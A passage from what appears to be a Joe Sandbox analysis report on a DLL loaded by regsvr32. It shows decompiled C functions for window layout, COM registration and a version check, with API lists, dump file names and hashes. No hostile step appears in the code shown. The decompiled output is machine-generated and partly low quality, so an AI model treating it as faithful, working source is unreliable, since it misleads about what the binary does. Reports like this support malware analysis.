                                                                                                                0x1003d5d7
                                                                                                                0x1003d5da
                                                                                                                0x1003d5dd
                                                                                                                0x1003d5df
                                                                                                                0x1003d5df
                                                                                                                0x1003d5df
                                                                                                                0x1003d5e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003d5ef
                                                                                                                0x1003d5fb
                                                                                                                0x1003d621
                                                                                                                0x1003d62c
                                                                                                                0x1003d62c
                                                                                                                0x1003d633
                                                                                                                0x1003d649
                                                                                                                0x1003d64b
                                                                                                                0x1003d64d
                                                                                                                0x1003d653
                                                                                                                0x1003d655
                                                                                                                0x1003d65d
                                                                                                                0x1003d660
                                                                                                                0x1003d66c
                                                                                                                0x1003d66c
                                                                                                                0x1003d688
                                                                                                                0x1003d693
                                                                                                                0x1003d69a
                                                                                                                0x1003d69a
                                                                                                                0x1003d695
                                                                                                                0x1003d695
                                                                                                                0x1003d695
                                                                                                                0x1003d6a0
                                                                                                                0x1003d6ab
                                                                                                                0x1003d6ae
                                                                                                                0x1003d6c9
                                                                                                                0x1003d6ce
                                                                                                                0x1003d6ce
                                                                                                                0x1003d6d5
                                                                                                                0x1003d6dc
                                                                                                                0x1003d759
                                                                                                                0x1003d759
                                                                                                                0x1003d765
                                                                                                                0x1003d771
                                                                                                                0x1003d776
                                                                                                                0x1003d780
                                                                                                                0x1003d780
                                                                                                                0x1003d787
                                                                                                                0x1003d790
                                                                                                                0x1003d792
                                                                                                                0x1003d6de
                                                                                                                0x1003d6e5
                                                                                                                0x1003d6f1
                                                                                                                0x1003d6ff
                                                                                                                0x1003d70f
                                                                                                                0x1003d717
                                                                                                                0x1003d718
                                                                                                                0x1003d71e
                                                                                                                0x1003d721
                                                                                                                0x1003d722
                                                                                                                0x1003d723
                                                                                                                0x1003d726
                                                                                                                0x1003d727
                                                                                                                0x1003d72c
                                                                                                                0x1003d72f
                                                                                                                0x1003d74d
                                                                                                                0x1003d752
                                                                                                                0x1003d755
                                                                                                                0x1003d755
                                                                                                                0x1003d7a8
                                                                                                                0x1003d7ad
                                                                                                                0x1003d7ad
                                                                                                                0x1003d7b2
                                                                                                                0x1003d7ba
                                                                                                                0x1003d7c2
                                                                                                                0x1003d7c4
                                                                                                                0x1003d7c6
                                                                                                                0x1003d7cc
                                                                                                                0x1003d7db
                                                                                                                0x1003d7db
                                                                                                                0x1003d7db
                                                                                                                0x1003d7ce
                                                                                                                0x1003d7ce
                                                                                                                0x1003d7d4
                                                                                                                0x00000000
                                                                                                                0x1003d7d6
                                                                                                                0x1003d7d8
                                                                                                                0x1003d7d8
                                                                                                                0x1003d7d4
                                                                                                                0x1003d7dd
                                                                                                                0x1003d7de
                                                                                                                0x00000000
                                                                                                                0x1003d7de
                                                                                                                0x1003d7bc
                                                                                                                0x1003d7bc
                                                                                                                0x1003d7bd
                                                                                                                0x1003d7e0
                                                                                                                0x1003d7e0
                                                                                                                0x1003d7e1
                                                                                                                0x1003d7e1
                                                                                                                0x1003d7e9
                                                                                                                0x1003d7ef
                                                                                                                0x1003d7fa
                                                                                                                0x1003d7fa
                                                                                                                0x1003d802
                                                                                                                0x1003d80e
                                                                                                                0x1003d80e
                                                                                                                0x1003d81b
                                                                                                                0x1003d81c
                                                                                                                0x1003d81f
                                                                                                                0x1003d82c

                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 1003D5EF
                                                                                                                • EqualRect.USER32 ref: 1003D60D
                                                                                                                • IsWindowVisible.USER32(?), ref: 1003D6B3
                                                                                                                • CopyRect.USER32(?,?), ref: 1003D6E5
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                  • Part of subcall function 1003CABE: GetWindowRect.USER32 ref: 1003CB22
                                                                                                                  • Part of subcall function 10017C59: SetWindowPos.USER32(?,?,00000006,?,?,00000000,00000000), ref: 10017C7F
                                                                                                                • GetParent.USER32(?), ref: 1003D79A
                                                                                                                  • Part of subcall function 1003C8A7: SetParent.USER32(?,00000000), ref: 1003C8B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$Parent$CopyEqualException@8H_prolog3ThrowVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 388495236-0
                                                                                                                • Opcode ID: de8c66a33fcc98470403020ca3bef0c2d831b215de4245826c4501e487d03b43
                                                                                                                • Instruction ID: 1033408fafe0d97a6b005ea6a196d6221c2d026f0d07b7c0cba03cff09cd3f54
                                                                                                                • Opcode Fuzzy Hash: de8c66a33fcc98470403020ca3bef0c2d831b215de4245826c4501e487d03b43
                                                                                                                • Instruction Fuzzy Hash: B8718A31A00609DFDB12DFA8CC85BAEBBBAFF45341F10452AE55AEF195DB31A905CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003D82F Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 41%
                                                                                                                			E1003D82F(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				signed char _t68;
				signed int _t73;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				signed int _t120;
				void* _t137;
				RECT* _t139;
				void* _t141;
				intOrPtr _t143;
				void* _t144;
				signed int _t146;
				void* _t148;
				void* _t149;

				_t137 = __edx;
				_t114 = __ecx;
				_t146 = _t148 - 0xb0;
				_t149 = _t148 - 0x130;
				_t61 =  *0x100b9e70; // 0xbb35530
				 *(_t146 + 0xac) = _t61 ^ _t146;
				_t143 =  *((intOrPtr*)(_t146 + 0xb8));
				_t139 =  *(_t146 + 0xbc);
				_t112 = __ecx;
				_t152 = __ecx;
				 *((intOrPtr*)(_t146 - 0x6c)) = _t143;
				 *(_t146 - 0x70) = _t139;
				if(__ecx == 0) {
					L1:
					E1000A069(_t112, _t114, _t139, _t143, _t152);
				}
				if(_t143 == 0) {
					goto L1;
				}
				_t65 = GetWindowRect( *(_t143 + 0x20), _t146 - 0x80);
				if( *((intOrPtr*)(_t143 + 0x8c)) != _t112 || _t139 != 0 && EqualRect(_t146 - 0x80, _t139) == 0) {
					if( *((intOrPtr*)(_t112 + 0x94)) != 0 && ( *(_t143 + 0x84) & 0x00000040) != 0) {
						 *(_t112 + 0x80) =  *(_t112 + 0x80) | 0x00000040;
					}
					 *(_t112 + 0x80) =  *(_t112 + 0x80) & 0xfffffff9;
					_t68 =  *(_t143 + 0x80) & 0x00000006 |  *(_t112 + 0x80);
					_t160 = _t68 & 0x00000040;
					 *(_t112 + 0x80) = _t68;
					if((_t68 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t146 - 0x58);
						E10018055(_t112, _t143, _t139, _t143, _t160);
						E100219F5(_t143, _t137,  *((intOrPtr*)(_t112 + 0x20)), _t146 - 0x58);
					}
					_t73 = ( *(_t143 + 0x80) ^  *(_t112 + 0x80)) & 0x0000f000 ^  *(_t143 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t112 + 0x94)) == 0) {
						_t74 = _t73 & 0xfffffffe;
						__eflags = _t73 & 0xfffffffe;
					} else {
						_t74 = _t73 | 0x00000001;
					}
					E10042892(_t143, _t74);
					_push(0xffffffff);
					_t140 = E1003CA62(_t112, GetDlgCtrlID( *(_t143 + 0x20)) & 0x0000ffff);
					if(_t140 > 0) {
						 *((intOrPtr*)(E1003C86D(_t112, _t112 + 0x98, _t140, _t143, _t140))) = _t143;
					}
					if( *(_t146 - 0x70) == 0) {
						__eflags = _t140 - 1;
						if(_t140 < 1) {
							_t140 = _t112 + 0x98;
							E100420F2(_t112, _t112 + 0x98, _t146,  *((intOrPtr*)(_t112 + 0xa0)), _t143);
							E100420F2(_t112, _t140, _t146,  *((intOrPtr*)(_t140 + 8)), 0);
						}
						_t118 =  *0x100bdc8c; // 0x2
						_push(0x115);
						__eflags = 0;
						_push(0);
						_push(0);
						_push( ~_t118);
						_t120 =  *0x100bdc88; // 0x2
						_push( ~_t120);
						_push(0);
					} else {
						CopyRect(_t146 - 0x68,  *(_t146 - 0x70));
						E1000C8F5(_t112, _t146 - 0x68);
						if(_t140 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)) - _t137 >> 1) +  *((intOrPtr*)(_t146 - 0x64)));
							_push(( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68) - _t137 >> 1) +  *(_t146 - 0x68));
							_t140 = _t149 - 0x10;
							_push( *((intOrPtr*)(_t146 - 0x6c)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1003CABE(_t112);
							_t143 =  *((intOrPtr*)(_t146 - 0x6c));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)));
						_push( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68));
						_push( *((intOrPtr*)(_t146 - 0x64)));
						_push( *(_t146 - 0x68));
						_push(0);
					}
					E10017C59(_t143);
					if(E10013FEA(_t112, _t143, _t146, GetParent( *(_t143 + 0x20))) != _t112) {
						E1003C8A7(_t143, _t112);
					}
					_t123 =  *((intOrPtr*)(_t143 + 0x8c));
					if( *((intOrPtr*)(_t143 + 0x8c)) != 0) {
						L1003CE7C(_t123, _t140, _t143, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t143 + 0x8c)) = _t112;
					 *(L10034F71(_t112) + 0xd0) =  *(_t65 + 0xd0) | 0x0000000c;
				}
				_pop(_t141);
				_pop(_t144);
				_pop(_t113);
				return E1004763E(_t65, _t113,  *(_t146 + 0xac) ^ _t146, _t137, _t141, _t144);
			}






















                                                                                                                0x1003d82f
                                                                                                                0x1003d82f
                                                                                                                0x1003d830
                                                                                                                0x1003d837
                                                                                                                0x1003d83d
                                                                                                                0x1003d844
                                                                                                                0x1003d84c
                                                                                                                0x1003d853
                                                                                                                0x1003d859
                                                                                                                0x1003d85b
                                                                                                                0x1003d85d
                                                                                                                0x1003d860
                                                                                                                0x1003d863
                                                                                                                0x1003d865
                                                                                                                0x1003d865
                                                                                                                0x1003d865
                                                                                                                0x1003d86c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003d875
                                                                                                                0x1003d881
                                                                                                                0x1003d8a5
                                                                                                                0x1003d8b0
                                                                                                                0x1003d8b0
                                                                                                                0x1003d8b7
                                                                                                                0x1003d8cd
                                                                                                                0x1003d8cf
                                                                                                                0x1003d8d1
                                                                                                                0x1003d8d7
                                                                                                                0x1003d8d9
                                                                                                                0x1003d8e1
                                                                                                                0x1003d8e4
                                                                                                                0x1003d8f0
                                                                                                                0x1003d8f0
                                                                                                                0x1003d90c
                                                                                                                0x1003d918
                                                                                                                0x1003d91f
                                                                                                                0x1003d91f
                                                                                                                0x1003d91a
                                                                                                                0x1003d91a
                                                                                                                0x1003d91a
                                                                                                                0x1003d925
                                                                                                                0x1003d92a
                                                                                                                0x1003d940
                                                                                                                0x1003d944
                                                                                                                0x1003d952
                                                                                                                0x1003d952
                                                                                                                0x1003d958
                                                                                                                0x1003d9cd
                                                                                                                0x1003d9d0
                                                                                                                0x1003d9d2
                                                                                                                0x1003d9de
                                                                                                                0x1003d9ea
                                                                                                                0x1003d9ea
                                                                                                                0x1003d9ef
                                                                                                                0x1003d9f5
                                                                                                                0x1003d9fa
                                                                                                                0x1003d9fc
                                                                                                                0x1003d9fd
                                                                                                                0x1003da00
                                                                                                                0x1003da01
                                                                                                                0x1003da09
                                                                                                                0x1003da0a
                                                                                                                0x1003d95a
                                                                                                                0x1003d961
                                                                                                                0x1003d96d
                                                                                                                0x1003d975
                                                                                                                0x1003d980
                                                                                                                0x1003d990
                                                                                                                0x1003d998
                                                                                                                0x1003d999
                                                                                                                0x1003d99d
                                                                                                                0x1003d99f
                                                                                                                0x1003d9a2
                                                                                                                0x1003d9a3
                                                                                                                0x1003d9a4
                                                                                                                0x1003d9a7
                                                                                                                0x1003d9a8
                                                                                                                0x1003d9ad
                                                                                                                0x1003d9ad
                                                                                                                0x1003d9b6
                                                                                                                0x1003d9bb
                                                                                                                0x1003d9c2
                                                                                                                0x1003d9c3
                                                                                                                0x1003d9c6
                                                                                                                0x1003d9c9
                                                                                                                0x1003d9c9
                                                                                                                0x1003da0d
                                                                                                                0x1003da23
                                                                                                                0x1003da28
                                                                                                                0x1003da28
                                                                                                                0x1003da2d
                                                                                                                0x1003da35
                                                                                                                0x1003da3c
                                                                                                                0x1003da3c
                                                                                                                0x1003da43
                                                                                                                0x1003da4e
                                                                                                                0x1003da4e
                                                                                                                0x1003da5b
                                                                                                                0x1003da5c
                                                                                                                0x1003da5f
                                                                                                                0x1003da6c

                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 1003D875
                                                                                                                • EqualRect.USER32 ref: 1003D890
                                                                                                                • GetDlgCtrlID.USER32 ref: 1003D92F
                                                                                                                • CopyRect.USER32(?,?), ref: 1003D961
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                  • Part of subcall function 1003CABE: GetWindowRect.USER32 ref: 1003CB22
                                                                                                                  • Part of subcall function 10017C59: SetWindowPos.USER32(?,?,00000006,?,?,00000000,00000000), ref: 10017C7F
                                                                                                                • GetParent.USER32(?), ref: 1003DA15
                                                                                                                  • Part of subcall function 1003C8A7: SetParent.USER32(?,00000000), ref: 1003C8B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Parent$CopyCtrlEqualException@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 964284190-0
                                                                                                                • Opcode ID: 3d664d8faf7a80dec14bbfa1b94fde56678420513a06af672007b5103854ab3e
                                                                                                                • Instruction ID: 50860e7fa6c8c0719ec3f0ef5932a3e24dacefad94686779ca8f32f31c2a9bc9
                                                                                                                • Opcode Fuzzy Hash: 3d664d8faf7a80dec14bbfa1b94fde56678420513a06af672007b5103854ab3e
                                                                                                                • Instruction Fuzzy Hash: D1618B75A006099FEB12DFA8CD85BEE77BAFB45301F00452AE95ADF291DF30A804CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10045069 Relevance: 7.7, APIs: 5, Instructions: 183windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10045069(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HICON__* _t78;
				void* _t80;
				struct HICON__* _t87;
				void* _t91;
				void* _t94;
				void* _t96;
				void* _t99;
				void* _t101;
				struct HICON__* _t108;
				void* _t127;
				void* _t147;
				int _t148;
				void* _t152;

				_t145 = __edx;
				E1004764D(0x10091875, __ebx, __edi, __esi);
				__imp__StringFromCLSID( *(_t152 + 0xc), _t152 - 0x14, 8);
				_t147 = E10020CCA( *((intOrPtr*)(_t152 - 0x14)));
				if(_t147 != 0) {
					_t151 =  *((intOrPtr*)(_t152 + 8));
					E10044CCF(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 0, _t147);
					E10044CCF(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 1,  *((intOrPtr*)(_t152 + 0x10)));
					__imp__CoTaskMemFree(_t147);
					L1000140B(_t152 - 0x10, E100184C0());
					 *((intOrPtr*)(_t152 - 4)) = 0;
					E10029AB3(0, __edx,  *((intOrPtr*)(E1001E302(0, _t147, _t151, __eflags) + 8)), _t152 - 0x10);
					E10044CCF(0, _t151, _t145, _t152, __eflags, 2,  *(_t152 - 0x10));
					E10044CCF(0, _t151, _t145, _t152, __eflags, 3,  *((intOrPtr*)(_t152 + 0x14)));
					E10044CCF(0, _t151, _t145, _t152, __eflags, 4,  *((intOrPtr*)(_t152 + 0x18)));
					E10044CCF(0, _t151, _t145, _t152, __eflags, 5,  *((intOrPtr*)(E1001E302(0, _t147, _t151, __eflags) + 0x10)));
					L1000140B(_t152 + 8, E100184C0());
					_t148 =  *(_t152 + 0x1c);
					__eflags = _t148;
					 *((char*)(_t152 - 4)) = 1;
					if(__eflags != 0) {
						 *(_t152 + 0xc) =  *(_t152 - 0x10);
						_t108 = ExtractIconA( *(E1001E302(0, _t148, _t151, __eflags) + 8),  *(_t152 + 0xc), _t148);
						__eflags = _t108;
						if(__eflags == 0) {
							_t148 = 0;
							__eflags = 0;
						} else {
							DestroyIcon(_t108);
						}
					}
					L1000106E(_t152 + 8, 0x1009d478, _t148);
					_t149 =  *((intOrPtr*)(_t152 + 8));
					E10044CCF(0, _t151, _t145, _t152, __eflags, 6,  *((intOrPtr*)(_t152 + 8)));
					E10044CCF(0, _t151, _t145, _t152, __eflags, 7,  *((intOrPtr*)(_t152 + 0x20)));
					L1000140B(_t152 + 0xc, E100184C0());
					_t78 =  *(_t152 + 0x24);
					__eflags = _t78;
					 *((char*)(_t152 - 4)) = 2;
					if(_t78 == 0) {
						L9:
						L100011E5(_t152 + 0xc,  *((intOrPtr*)(_t152 + 0x20)));
						_t80 = E10027BB5(_t152 + 0xc, 0x28, 0);
						__eflags = _t80 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t80 == 0xffffffff) {
							L12:
							L100011D1(_t127);
							goto L14;
						}
						_t91 = E10027ECF(_t127, _t152 + 0x20, _t80 + 1);
						 *((char*)(_t152 - 4)) = 3;
						E10018A1F(0, _t152 + 0xc, _t152, _t91);
						 *((char*)(_t152 - 4)) = 2;
						L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
						_t94 = E10027BB5(_t152 + 0xc, 0x2e, 0);
						__eflags = _t94 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t94 == 0xffffffff) {
							goto L12;
						}
						_t96 = E10027ECF(_t127, _t152 + 0x20, _t94);
						 *((char*)(_t152 - 4)) = 4;
						E10018A1F(0, _t152 + 0xc, _t152, _t96);
						 *((char*)(_t152 - 4)) = 2;
						L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
						_t99 = E10027BB5(_t152 + 0xc, 0x29, 0);
						__eflags = _t99 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t99 != 0xffffffff) {
							_t101 = E10027DD9(_t127, _t152 + 0x20, _t99);
							 *((char*)(_t152 - 4)) = 5;
							E10018A1F(0, _t152 + 0xc, _t152, _t101);
							__eflags =  *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0;
							L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
							goto L14;
						}
						goto L12;
					} else {
						__eflags = _t78->i;
						if(_t78->i == 0) {
							goto L9;
						}
						L100011E5(_t152 + 0xc, _t78);
						L14:
						_t112 =  *(_t152 + 0xc);
						E10044CCF( *(_t152 + 0xc), _t151, _t145, _t152, __eflags, 8,  *(_t152 + 0xc));
						L100013E3(_t112 - 0x10, _t145);
						L100013E3(_t149 - 0x10, _t145);
						L100013E3( &(( *(_t152 - 0x10))[0xfffffffffffffff0]), _t145);
						_t87 = 1;
						__eflags = 1;
						L15:
						return E10047725(_t87);
					}
				}
				_t87 = 0;
				goto L15;
			}
















                                                                                                                0x10045069
                                                                                                                0x10045070
                                                                                                                0x1004507c
                                                                                                                0x1004508a
                                                                                                                0x10045090
                                                                                                                0x10045099
                                                                                                                0x100450a0
                                                                                                                0x100450ac
                                                                                                                0x100450b2
                                                                                                                0x100450c1
                                                                                                                0x100450c6
                                                                                                                0x100450d6
                                                                                                                0x100450e2
                                                                                                                0x100450ee
                                                                                                                0x100450fa
                                                                                                                0x1004510b
                                                                                                                0x10045119
                                                                                                                0x1004511e
                                                                                                                0x10045121
                                                                                                                0x10045123
                                                                                                                0x10045127
                                                                                                                0x1004512c
                                                                                                                0x1004513c
                                                                                                                0x10045142
                                                                                                                0x10045144
                                                                                                                0x1004514f
                                                                                                                0x1004514f
                                                                                                                0x10045146
                                                                                                                0x10045147
                                                                                                                0x10045147
                                                                                                                0x10045144
                                                                                                                0x1004515b
                                                                                                                0x10045160
                                                                                                                0x1004516b
                                                                                                                0x10045177
                                                                                                                0x10045185
                                                                                                                0x1004518a
                                                                                                                0x1004518d
                                                                                                                0x1004518f
                                                                                                                0x10045193
                                                                                                                0x100451a7
                                                                                                                0x100451ad
                                                                                                                0x100451b8
                                                                                                                0x100451bd
                                                                                                                0x100451c0
                                                                                                                0x100451c3
                                                                                                                0x10045238
                                                                                                                0x10045238
                                                                                                                0x00000000
                                                                                                                0x10045238
                                                                                                                0x100451cb
                                                                                                                0x100451d4
                                                                                                                0x100451d8
                                                                                                                0x100451e3
                                                                                                                0x100451e7
                                                                                                                0x100451f2
                                                                                                                0x100451f7
                                                                                                                0x100451fa
                                                                                                                0x100451fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10045204
                                                                                                                0x1004520d
                                                                                                                0x10045211
                                                                                                                0x1004521c
                                                                                                                0x10045220
                                                                                                                0x1004522b
                                                                                                                0x10045230
                                                                                                                0x10045233
                                                                                                                0x10045236
                                                                                                                0x10045244
                                                                                                                0x1004524d
                                                                                                                0x10045251
                                                                                                                0x10045259
                                                                                                                0x1004525c
                                                                                                                0x00000000
                                                                                                                0x1004525c
                                                                                                                0x00000000
                                                                                                                0x10045195
                                                                                                                0x10045195
                                                                                                                0x10045197
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004519d
                                                                                                                0x10045261
                                                                                                                0x10045261
                                                                                                                0x10045269
                                                                                                                0x10045271
                                                                                                                0x10045279
                                                                                                                0x10045284
                                                                                                                0x1004528b
                                                                                                                0x1004528b
                                                                                                                0x1004528c
                                                                                                                0x10045291
                                                                                                                0x10045291
                                                                                                                0x10045193
                                                                                                                0x10045092
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10045070
                                                                                                                • StringFromCLSID.OLE32(?,?), ref: 1004507C
                                                                                                                  • Part of subcall function 10020CCA: CoTaskMemFree.OLE32(00000000), ref: 10020CDB
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 100450B2
                                                                                                                • ExtractIconA.SHELL32(?,?,?), ref: 1004513C
                                                                                                                • DestroyIcon.USER32(00000000), ref: 10045147
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeIconTask$DestroyExtractFromH_prolog3String
                                                                                                                • String ID:
                                                                                                                • API String ID: 2818569797-0
                                                                                                                • Opcode ID: 591b60d6889b0c773876b142260c05f206530f88d93d4be920f53e24253c0822
                                                                                                                • Instruction ID: ab5e8c94ddb41993ccef22247f94a03736f241471aafc1ae80ca1b2f4dc0b3c1
                                                                                                                • Opcode Fuzzy Hash: 591b60d6889b0c773876b142260c05f206530f88d93d4be920f53e24253c0822
                                                                                                                • Instruction Fuzzy Hash: 4D519F79100148ABDB05DFB0CC96EEE3769EF45354F208219F92AAB2D2DF34AA04C765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003850F Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1003850F(void* __ebx, intOrPtr __ecx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
				intOrPtr _t70;
				signed int _t72;
				void* _t82;
				char* _t89;
				intOrPtr _t92;
				void* _t101;
				char* _t102;
				signed char _t103;
				void* _t110;
				intOrPtr _t118;
				void* _t119;
				void* _t120;
				signed int _t129;

				_t115 = __edi;
				_push(0xa4);
				E100476B6(0x10090cfc, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t119 - 0xac)) =  *((intOrPtr*)(_t119 + 0x10));
				 *((intOrPtr*)(_t119 - 0xa8)) =  *((intOrPtr*)(_t119 + 0x18));
				_t118 = __ecx;
				 *((intOrPtr*)(_t119 - 0xb0)) = __ecx;
				E1001B6E7(__ecx, 0,  *((intOrPtr*)(_t119 + 0x1c)));
				 *((intOrPtr*)(_t119 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1009eb6c;
				L100010DC(__ecx + 0x7c);
				 *((char*)(_t119 - 4)) = 1;
				if( *((intOrPtr*)(_t119 + 0x20)) == 0) {
					_t115 = 0x94;
					E10049170(0x94, _t119 - 0xa4, 0, 0x94);
					_t120 = _t120 + 0xc;
					 *(_t119 - 0xa4) = 0x94;
					GetVersionExA(_t119 - 0xa4);
					if( *((intOrPtr*)(_t119 - 0x94)) != 2) {
						L3:
						 *((intOrPtr*)(_t119 + 0x20)) = 0x4c;
					} else {
						 *((intOrPtr*)(_t119 + 0x20)) = 0x58;
						if( *((intOrPtr*)(_t119 - 0xa0)) < 5) {
							goto L3;
						}
					}
				}
				_t70 = E10047026(0, _t110, _t115, _t118,  *((intOrPtr*)(_t119 + 0x20)));
				_t127 = _t70;
				_pop(_t101);
				 *((intOrPtr*)(_t118 + 0x74)) = _t70;
				if(_t70 == 0) {
					_t70 = E1000A035(0, _t101, _t115, _t118, _t127);
				}
				E10049170(_t115, _t70, 0,  *((intOrPtr*)(_t119 + 0x20)));
				_t72 =  *(_t119 + 8);
				 *(_t118 + 0x78) = _t72;
				asm("sbb eax, eax");
